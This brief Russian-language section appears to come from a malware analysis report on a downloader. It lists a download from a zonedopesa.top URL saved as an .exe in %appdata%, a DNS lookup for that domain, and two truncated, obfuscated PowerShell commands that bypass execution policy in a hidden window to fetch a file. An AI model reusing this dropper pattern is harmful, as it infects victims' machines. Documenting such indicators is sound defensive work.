Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^werShELL.Ex^e -eX^ec^uTi^oNpO^L^IC^y b^ypa^s^s^ -n^o^p^RO^FI^le^ -Win^DOwS^TY^L^e^ hid^dEn (new-oBJEcT ^sYst^e^m.Ne^t.wE^B^C^li^eNT).D^oW^nLOA^dfIlE^(^'http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "pO^werShELL.Ex^e -eX^ec^uTi^oNpO^L^IC^y b^ypa^s^s^ -n^o^p^RO^FI^le^ -Win^DOwS^TY^L^e^ hid^dEn (new-oBJEcT ^sYst^e^m.Ne^t.wE^B^C^li^eNT).D^oW^nLOA^dfIlE^(^'http://www.zonedopesa...' (со скрытым окном)